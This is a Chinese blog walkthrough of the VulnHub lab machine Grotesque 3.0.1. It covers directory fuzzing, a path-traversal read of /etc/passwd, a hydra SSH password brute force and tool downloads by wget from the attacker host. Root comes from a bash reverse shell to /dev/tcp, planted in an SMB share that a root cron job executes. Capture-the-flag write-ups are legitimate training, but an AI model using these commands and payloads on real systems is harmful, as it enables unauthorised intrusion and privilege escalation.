Grotesque:3.0.1 vulnhub靶场(papy64,linpeas.sh)

kali攻击机ip:192.168.56.107

在这里插入图片描述

主机发现

arp-scan -I eth0 -l 

在这里插入图片描述

端口全扫描

nmap -sS -p-  -A 192.168.56.110

发现很常规的开放了22,80端口

在这里插入图片描述

web服务器为apache 2.4.38版本

我尝试searchspolit和查找cve,都没有发现可利用的漏洞

在这里插入图片描述

发现一张图片,暂时没发现有什么特别的

在这里插入图片描述

目录探测

还是常规的扫一波目录

dirb http://192.168.56.110    

一无所获

在这里插入图片描述

加上后缀扫

dirb http://192.168.56.110  -X .txt,.php,.zip

依旧一无所获

在这里插入图片描述

把页面图片都下载下来使用记事本查看源码

又双叒没发现 =_=

在这里插入图片描述

在这里插入图片描述

不信邪,回去再看看图片,这么大一个图片放着肯定有它的用意,不在源码,那就是图片本身了

放大观察,终于被我发现了地图上有md加五个X,说不定就是md5

在这里插入图片描述

md5字典爆破

这段代码摘自别的博主,因为我不会写=_=

for i in $(cat /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt); do echo $i | md5sum >> dir.txt; done

在这里插入图片描述

cat dir.txt

发现字典后面跟着无关的两个空格一个"-",需要手动删除

在这里插入图片描述

在vmware中点击文件,使用mousepad打开文件,点击图标中倒数第二个,查找并替换多余字符

在这里插入图片描述

在这里插入图片描述

使用ffuf再次探测目录

ffuf -w ./dir.txt -u http://192.168.56.110/FUZZ -e .txt,.php -mc 200   

发现.php文件

在这里插入图片描述

f66b22bf020334b04c7d0d3eb5010391.php

咦,啥也没有

在这里插入图片描述

源码也是空的

在这里插入图片描述

只能再看看是不是存在LFI

继续使用md5字典模糊测试,没有结果

在这里插入图片描述

因为这台kali是新弄的,没有下载字典,那就先尝试kali自带字典扫描

使用common.txt没结果

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://192.168.56.110/f66b22bf020334b04c7d0d3eb5010391.php/?FUZZ=../../../../etc/passwd  -fw 1 

在这里插入图片描述

改用big

ffuf -w /usr/share/wordlists/dirb/big.txt -u http://192.168.56.110/f66b22bf020334b04c7d0d3eb5010391.php/?FUZZ=../../../../etc/passwd  -fw 1 

有了!差点想去下载字典了

在这里插入图片描述

purpose

http://192.168.56.110/f66b22bf020334b04c7d0d3eb5010391.php/?purpose=../../../../etc/passwd

在这里插入图片描述

这个freddie的主目录在/home下,很有可能就是ssh远程登录的用户

在这里插入图片描述

没有密码提示,那就再试试md5字典爆破

hydra -l freddie -P dir.txt 192.168.56.110 ssh 

在这里插入图片描述

61a4e3e60c063d1e472dd780f64e6cad

ssh远程连接

ssh freddie@192.168.56.110

在这里插入图片描述

用户目录下发现flag

在这里插入图片描述

papy64和linpeas.sh下载

papy64下载地址

GitHub - DominicBreuker/pspy: Monitor linux processes without root permissions

linpeas.sh下载地址

GitHub - carlospolop/PEASS-ng: PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)

直接上传linpeas.sh和pspy64

在这里插入图片描述

kali攻击机开启htttp服务

python -m http.server 80
wget http://192.168.56.107/linpeas.sh 

在这里插入图片描述

wget http://192.168.56.107/pspy64

在这里插入图片描述

赋予执行权限

chmod 777 linpeas.sh

chmod 777 pspy64

在这里插入图片描述

./linpeas.sh 

在这里插入图片描述

没有找到有用信息,那就执行pspy64看看有没有定时任务

./pspy64

等待一会,发现uid=0的用户,也就是root,隔一会就会重复执行bash /smbshare/*,也就是/smbshare目录下的所有文件

在这里插入图片描述

可以访问/smbshare,而且该目录是空的

在这里插入图片描述

提权

既然如此,我们可以上传一个bash反弹shell到该目录,然后等待文件定时执行(不会使用vi,只能上传了)

#!/bin/bash

bash -i >& /dev/tcp/192.168.56.110/8888 0>&1
wget http://192.168.56.107:8888/shell.sh

无法直接写入shell.sh

在这里插入图片描述

想了想,这个目录名为/smbshare,或许跟445端口的smb服务有关

没有netstat命令,但还能使用ss

ss -lntp

在这里插入图片描述

可以看出开放了445端口,不知道为啥刚刚linpeas.sh没有扫出来

我还回去看了一遍,是真的没有,真不是我瞎

在这里插入图片描述

使用smbclient查看smb共享服务

smbclient -L 127.0.0.1

发现grotesque目录

在这里插入图片描述

上传shell.sh

cd ~
wget http://192.168.56.107:8888/shell.sh
chmod 777 shell.sh

像ftp一样使用smbclient

smbclient  -N //127.0.0.1/grotesque
put shell.sh

在这里插入图片描述

在这里插入图片描述

发现确实上传至/smbshare目录下了

在这里插入图片描述

kali开启监听

nc -lvp 8888

在这里插入图片描述

接下来就是等待root执行定时任务了

不想干等着,再次运行pspy64,发现已执行了shell.sh

在这里插入图片描述

回到nc界面,确实得到了反弹shell,而且是root权限的

在这里插入图片描述

得到flag

在这里插入图片描述

o了 😃

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值